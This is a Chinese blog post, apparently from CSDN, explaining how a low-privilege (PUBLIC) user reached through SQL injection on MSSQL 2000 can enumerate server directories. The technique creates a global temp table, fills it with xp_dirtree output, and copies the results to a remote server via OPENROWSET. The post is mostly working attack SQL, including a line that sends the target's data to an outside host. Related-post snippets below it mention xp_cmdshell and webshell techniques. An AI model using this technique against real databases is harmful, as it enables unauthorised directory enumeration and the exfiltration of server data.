MSSQL注入PUBLIC权限下的xp_dirtree再度利用

最新推荐文章于 2022-04-12 12:51:56 发布
最新推荐文章于 2022-04-12 12:51:56 发布
阅读量3.9k 收藏 1
点赞数
分类专栏: MSSQL 文章标签: xp insert 存储 服务器 table user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kj021320/article/details/1736964
版权

软件作者:kj021320
信息来源:I.S.T.O技术团队(http://blog.csdn.net/I_S_T_O/

本来这文章在TEAM里面放了好久的了!只是<<art of sql injection>>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先发出来了!主要是MSSQL2005都来了!2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...

正文:

提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssqlpublicdb_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧

--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表

create table ##nonamed(

       dir ntext,

       num int

)

--调用存储过程把执行回来的数据存到临时表里面

insert ##nonamed execute master..xp_dirtree 'c:/',1

--然后采用openrowset函数把临时表的数据导到本地MSSQL dirtree表里面了

insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')

select * from ##nonamed

以上方法,也就是说public可以遍历用户服务器的目录 具体有什么利用价值嘛~呵呵见仁见智了 
kj021320
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL Server下几个危险的扩展存储过程
01-21
这些存储过程如下: sp_makewebtask xp_cmdshell xp_dirtree xp_fileexist xp_terminate_process sp_oamethod sp_oacreate xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_...
Mssql高级注入笔记II
01-01
一些sql扩展 xp_regaddmultistring xp_regdeletekey 删除键名...xp_dirtree 看目录 xp_enumdsn ODBC数据源 xp_loginconfig 一些服务器安全配置的信息 xp_makecab 打包,某些dbo权限先可做大用 xp_ntsec_enum
浅析mssql渗透之XP_dirtree LLMNR/NBT-NS欺骗攻击
qq_60115503的博客
04-12 3358
LIMNR是什么? 链路本地多播名称解析(LIMNR)是一个基于协议的域名系统(DNS)数据包的格式,使得双方的IPv4和IPv6的主机来执行名称解析为同一本地链路上的主机,当局域网中的DNS服务器不可用时,DNS客户端会使用LIMNR本地链路多播名称解析来解析本地的主机名称 NetBIOS是什么? Netbios(Network Basic Input Output System):网络基本输入输出系统,提供OSI模型中的会话层服务,分享数据,是一种应用程序接口API同时系统可以利用WINS服务将N
MSSQL注入PUBLIC权限下的xp_dirtree再度
rjgcwl的专栏
01-15 1185
MSSQL注入PUBLIC权限下的xp_dirtree再度利 文章作者:kj021320信息来源:邪恶八进制信息安全团队(www.eviloctal.com)本来这文章在TEAM里面放了好久的了!只是>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先发出来了!主要是MSSQL2005
SQL注入不完全思路与防注入程序
weixin_30892987的博客
07-25 163
<一>SQL注入简介   许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,(一般是在浏览器地址栏进行,通过正常的www端口访问)根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。   <二>SQL注入思路   思路最重要。其实好多人都不知道SQL到底能做什么呢?这里总结...
手工sql注入
11-12
手工 SQL 注入是指攻击者在未经授权的情况下,通过在 SQL 语句中插入恶意代码来访问、控制或破坏数据库的行为。这种攻击方式可以导致严重的安全问题,包括数据泄露、权限提升、命令执行等。 1.xp_cmdshell 扩展: ...
目录结构生成器DirTree,可手动修改生成文件(txt、xlsx等)
最新发布
10-13
DirTree:构建与自定义目录结构的利器》 在IT行业中,管理和组织文件和目录是日常工作的重要组成部分。为了高效地处理复杂的文件系统,我们常常需要一种工具来快速生成和编辑目录结构。DirTree就是这样一款实用的...
mssql注入艰难拿站1
08-03
xp_subdirs】在无法使用`xp_dirtree`的情况下,使用`xp_subdirs`列出目录,尽管不能列出文件,但能获取目录结构。 【持续的攻击策略】即使遇到困难,攻击者仍坚持不懈地尝试,如通过不同的工具和方法重新枚举目录...
(转-收集)MSSQL手工注入语句集合
weixin_30553837的博客
04-16 251
andexists(select*fromsysobjects)//判断是否是MSSQL andexists(select*fromtableName)//判断某表是否存在..tableName为表名 and1=(select@@VERSION)//MSSQL版本 And1=(selectdb_name())//当前数据库名 and1=(select@...
SQL Server存储过程和参数示例
网络 人生 学习 进步
09-17 3331
        一些用在SQL 2000的企业管理GUI中,并且不打算用于其他的流程。微软已预计将其中的一些存储过程从未来的SQL Server版本中删除(或已经删除了)。虽然这些存储过程可能很有用并为你节省了很多时间,但是他们可以在任何时候改变他们的函数或简单的删除掉。  下面的图表显示了当许多存储过程从一个Microsoft SQL Server版本移入另一个版本时,引入了新的存储过程,而
Sql2000-错误2812:xp_dirtreexp_regread错误方法
weixin_30699741的博客
07-03 345
备份数据库,企业管理器注册数据库服务发现xp_dirtreexp_regread问题的处理办法 未能找到存储过程 master.dbo.xp_dirtree 1、使用查询分析器执行以下脚本 User master EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll' EXEC sp_addextendedproc...
未能找到存储过程 master.dbo.xp_dirtree|错误2812
weixin_30443895的博客
03-21 263
未能找到存储过程 master.dbo.xp_dirtree|错误2812 解决未能找到存储过程 master.dbo.xp_dirtree 把恢复数据库需要用到的存储过程个恢复 打开MSSQL查询分析器,分别运行下面的两条数据库语句即可. ...
public和db_owner权限拿到webshell
得峰的专栏 [网络收藏]
05-23 1459
在看之前我们先回顾一下目前在公开或者已知的public和db_owner权限拿到webshell或者系统权限的思路和方法(sysadmin权限我就不说拉,给你这么一句,只要是sysadmin,拿不到webshell或者系统权限那是你的无能)public下面我还没见到一种可以真正能利用的方法。db_owner目前公开的方法主要有5种:第一种就是最普遍的backup,现在利用差异备份生成的asp文件确
实例:Public权限渗透某asp.net网站
mituan1234567的专栏
06-26 4161
http://netsecurity.51cto.com/art/201104/254307.htm 【51CTO.com 独家特稿】本文知识要点: (1)使用Google搜索管理后台真实地址 (2)LCX端口转发程序突破内网限制 (3)Asp.net类网站的渗透思路 对于数据库用户权限Public的网站渗透相对较难,设置为这种权限,多数具有较高的安全意识,在通
SQL Sever中可以使用哪个存储过程调用操作系统命令,添加系统账号?() xp_dirtree xp_cmdshell xp_xshell xpdeletekey
06-12
SQL Server中可以使用 `xp_cmdshell` 存储过程调用操作系统命令,...但是,这个存储过程需要特殊的权限才能执行,因此应该谨慎使用。至于添加系统账号,这是一个非常危险的操作,一般情况下不应该使用存储过程来实现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值